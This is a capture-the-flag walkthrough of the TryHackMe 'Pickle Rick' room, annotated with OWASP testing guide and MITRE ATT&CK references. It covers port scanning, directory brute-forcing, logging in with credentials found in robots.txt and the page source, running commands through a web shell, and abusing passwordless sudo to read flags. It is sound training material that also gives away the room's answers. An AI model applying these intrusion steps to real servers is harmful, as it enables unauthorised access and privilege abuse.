tryhackme - pickle rick

https://tryhackme.com/room/picklerick

This box was a lot of fun due to it’s simplicity and lack of rabbit holes to fall through. It has a very straightforward kill chain and is a great beginner level challenge.

Like a lot of CTFs, this box is web app focused and so I’m going to use the opportunity to promote the amazing work of the OWASP group as I walk through the challenge. I was introduced to their Web Security Testing Guide (WSTG) during an Ethical Hacking course that I recently finished and in an effort to continue learning and practicing a structured methodology I am going to include links and snippets throughout this write-up.

In the same spirit of learning and practice I will also include references to the Mitre ATT&CK framework where applicable.


Enumeration

Fingerprint Web Server

WSTG-INFO-02

Web server fingerprinting is the task of identifying the type and version of web server that a target is running on. While web server fingerprinting is often encapsulated in automated testing tools, it is important for researchers to understand the fundamentals of how these tools attempt to identify software, and why this is useful.

Accurately discovering the type of web server that an application runs on can enable security testers to determine if the application is vulnerable to attack. In particular, servers running older versions of software without up-to-date security patches can be susceptible to known version-specific exploits.

One of the automated testing tools referenced above is Nmap so lets do a quick and dirty scan of all TCP ports,

followed by a more detailed scan of the results.

There’s not much here and is partly what makes this such a great challenge for beginners; you only need to focus on a few things and there isn’t much chance of getting bogged down or lost.

Now that we know there is definitely a web server listening for traffic on this server we can move on to enumerating it directly.

Review Webserver Metafiles for Information Leakage

WSTG-INFO-03

Web Spiders, Robots, or Crawlers retrieve a web page and then recursively traverse hyperlinks to retrieve further web content. Their accepted behavior is specified by the Robots Exclusion Protocol of the robots.txt file in the web root directory…

…The Disallow directive specifies which resources are prohibited by spiders/robots/crawlers.

This entry leads to ‘404 Not Found’ so it’s location in the robots file is conspicuous. If you have never watched the Rick & Morty TV show then you probably wouldn’t recognize such a strange word but a quick search reveals that it’s a catchphrase of the show’s protagonist, Rick.

Let’s tuck this away for later.

Review Webpage Content for Information Leakage

WSTG-INFO-05

It is very common, and even recommended, for programmers to include detailed comments and metadata on their source code. However, comments and metadata included into the HTML code might reveal internal information that should not be available to potential attackers. Comments and metadata review should be done in order to determine if any information is being leaked.

On any webpage you should be able to right-click and select “View Page Source” to view the source code of the page itself.

Fingerprint Web Application Framework

WSTG-INFO-08

Web framework[*] fingerprinting is an important subtask of the information gathering process. Knowing the type of framework can automatically give a great advantage if such a framework has already been tested by the penetration tester. It is not only the known vulnerabilities in unpatched versions but specific misconfigurations in the framework and known file structure that makes the fingerprinting process so important.

You can use a browser extension such as Wappalyzer for this task

Let’s zoom in on this information and look at it a little more closely.

Apart from knowing what the specific version of Apache is running this site (which we also got from our Nmap scan earlier) I want you to zero in on the programming language being used.

Knowing the programming language, and thus the file extension type, also helps you potentially reduce the amount of enumeration you need to do.

For example, Microsoft’s IIS web server uses a proprietary file type known as ASP.NET - so if you know that your target is actually Apache then you can omit certain file types from enumeration techniques such as brute-forcing the web directory (the next step below).

Enumerate Infrastructure and Application Admin Interfaces

WSTG-CONF-05

Administrator interfaces may be present in the application or on the application server to allow certain users to undertake privileged activities on the site. Tests should be undertaken to reveal if and how this privileged functionality can be accessed by an unauthorized or standard user.

As the testing guide says, there are a few different techniques for sniffing out admin interfaces but since this is such a simple challenge we are going to brute-force the directories on the target website. You can take your pick of tools such as Dirb or Dirbuster but I like using Gobuster, just use whatever suits you.

The syntax here is as follows,

gobuster: the app itself

dir: directory mode, for brute forcing web directories

-u: URL of the target

-t: threads, number of concurrent connections to attempt (if you don’t specify this then the scanner defaults to 10)

-x: extensions, list out the file extensions to test

  • based on our fingerprinting earlier we know that we need to include php but we can safely omit things like asp and thus reduce our scan time

-w: wordlist, the location of the wordlist you want to use for the brute force scanning

That /login.php page looks interesting…

But what are the login credentials?


Exploitation

Earlier we found a username in the source code of the homepage but we don’t know what that account is for so we move on to the next step in the testing process.

Testing for Account Enumeration and Guessable User Account

WSTG-IDNT-04

Often, web applications reveal when a username exists on system, either as a consequence of mis-configuration or as a design decision. For example, sometimes, when we submit wrong credentials, we receive a message that states that either the username is present on the system or the provided password is wrong. The information obtained can be used by an attacker to gain a list of users on system. This information can be used to attack the web application, for example, through a brute force or default username and password attack.

If we try the username we found earlier and the password of “admin” or “password” we get this error:

Good on the the web devs for obfuscating which input is incorrect! This makes our testing harder - but not impossible, especially for an easy challenge like this.

See below for an example from my last write-up of what an app should NOT do.

So what IS the correct login?

Think about most beginner CTF challenges as if they were video games. What I mean by that is the game developers want you to succeed and beat the game so they purposefully design the levels and challenges in such a way so as to provide you with everything you need to make progress - you just need to put the pieces together.

There’s not much to enumerate on this box so we should already have everything we need to make progress. We can safely assume that the username for the login portal is R1ckRul3s but what about the password? We could attempt to brute-force it the same way we did the website’s directory structure but first let’s take another look at what information we’ve gathered.

Do you remember the robots.txt file? Do you remember what entry was there?

What if we tried R1ckRul3s:Wubbalubbadubdub for the username:password?

And we are in!

Since we are trying to be thorough let’s also call out how this app falls victim to the second application security risk in OWASP’s Top Ten.

OWASP-A2:2017-Broken Authentication

If the “admin” of this website had used multi-factor authentication then it would have stopped us from gaining access and subsequently broken our kill chain.

shame.gif

The Mitre ATT&CK framework also has some things to say about user accounts,

ATT&CK ID: T1078 - Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

So now that we are in what do we do next?

The first thing we should do is continue exploring the app - navigate the different pages, click buttons, and generally try to understand the normal function. This is called “walking the happy path” and if you are a beginning learner like me it will help you to gain a better understanding not only of the system you are looking at but also the structure of web applications in general.

We are currently on the /portal.php page so let’s take a look at the source:

There is a comment that includes what looks to be a base64-encoded string but after spending a minute trying to decode it nothing came up. I’ll admit that I’m still very curious to know the meaning of that comment but not enough to spend any more time digging into it.

If we click on the next page in the nav bar, Potions, we get redirected to a page called /denied.php:

The source code shows that the other pages in the nav bar also redirect to this same denied.php page so we don’t need to spend the time to enumerate them further.

No other interesting comments in the code either so we can go back to the main /portal.php page.

There is an input field simply called “Commands” and we know from our earlier enumeration that this is an Ubuntu server so let’s try the Linux command whoami.

The response is “www-data” which is the default account for the Apache server on Ubuntu systems. Running a command in the web GUI and then seeing output from the underlying operating system means that we have the ability to run commands on the underlying operating system through this web page, otherwise known as a web shell.

Let’s run “sudo -l” to see what kind of permissions have been configured for this account.

This account has what is known as “open sudo” privileges - meaning there is no password required to use the sudo command and we can basically do whatever we want. This is a massive security mis-configuration since the www-data account is meant to be confined to the Apache server itself. Flaws like this are covered in more detail in application risk number six of the OWASP Top Ten.

OWASP-A6:2017-Security Misconfiguration

Mitre has this to say about securing access to sudo:

ATT&CK ID: T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching

If you are interested in learning more about sudo and how it can be abused I would recommend checking out this video from Tyler Boykin who presented at this year’s Defcon conference.

Tyler Boykin is a former 0602 (USMC), hobbyist infosec geek, and is a Security Engineer with By Light Professional IT Services LLC currently developing featu...

With unrestricted access to root privileges granted to us by open sudo this server is now what we in the industry call “completely hosed”. We can do anything we want to this box including, but not limited to:

  1. Deface the website

  2. Modify the website to serve up malware to infect visitors

  3. Install a rootkit

  4. Install a hidden backdoor

  5. Exfiltrate data and/or sensitive information

  6. Pivot to other targets in the same local network

  7. etc…

Even if the owners of the server somehow managed to regain control of it there would always be doubt as to whether they found everything. The only way to completely recover from this would be to rebuild the server from the ground up and hope they have good backups ¯\_(ツ)_/¯

If we run the “ls -la” command to see what we can find in our current directory we find the first flag:

But if we try to look at the file with the “cat” command we get blocked.

There are other ways to view files in Linux so try a few and see what works.

By the way, Mitre has some more things to say about attackers rummaging around in other people’s file systems.

ATT&CK ID: T1005 - Data from Local System

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

ATT&CK ID: T1083 - File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. [1] Custom tools may also be used to gather file and directory information and interact with the Native API.

If we look around in the /home directory we can see a user account named ‘rick’ that looks interesting. The owner is the root account but look at the permissions:

Even without sudo permissions we can still access this directory due to those overly broad file permissions. Inside we will find the second flag.

What about the last flag?

If you look in the root user’s home folder you will find it there but I’ll show you another way to view it.

Do you remember who the other user is in the home folder?

Those permissions allow us to look around inside the directory…

…and see the .bash_history file.

With it’s current settings only the ubuntu user can view that file but we have open sudo priviledges, remember?

Kill Chain

So now we’ve found the last flag lets go back and review the whole kill chain from start to finsh:

  1. Scanned the target with Nmap and discovered a web server listening on port 80

  2. Used various fingerprinting techniques to gather information such as:

    1. Username of the web application administrator in the main page source code

    2. The administrator password in the robots file

    3. The type and version of web server running on the target

    4. The primary programming language used by the web server

  3. Brute-forced the web server’s directories to discover the admin login portal

  4. Abused the overly broad permissions of the default Apache account via the app’s builtin web shell to enumerate the file system and access sensitive information on the target server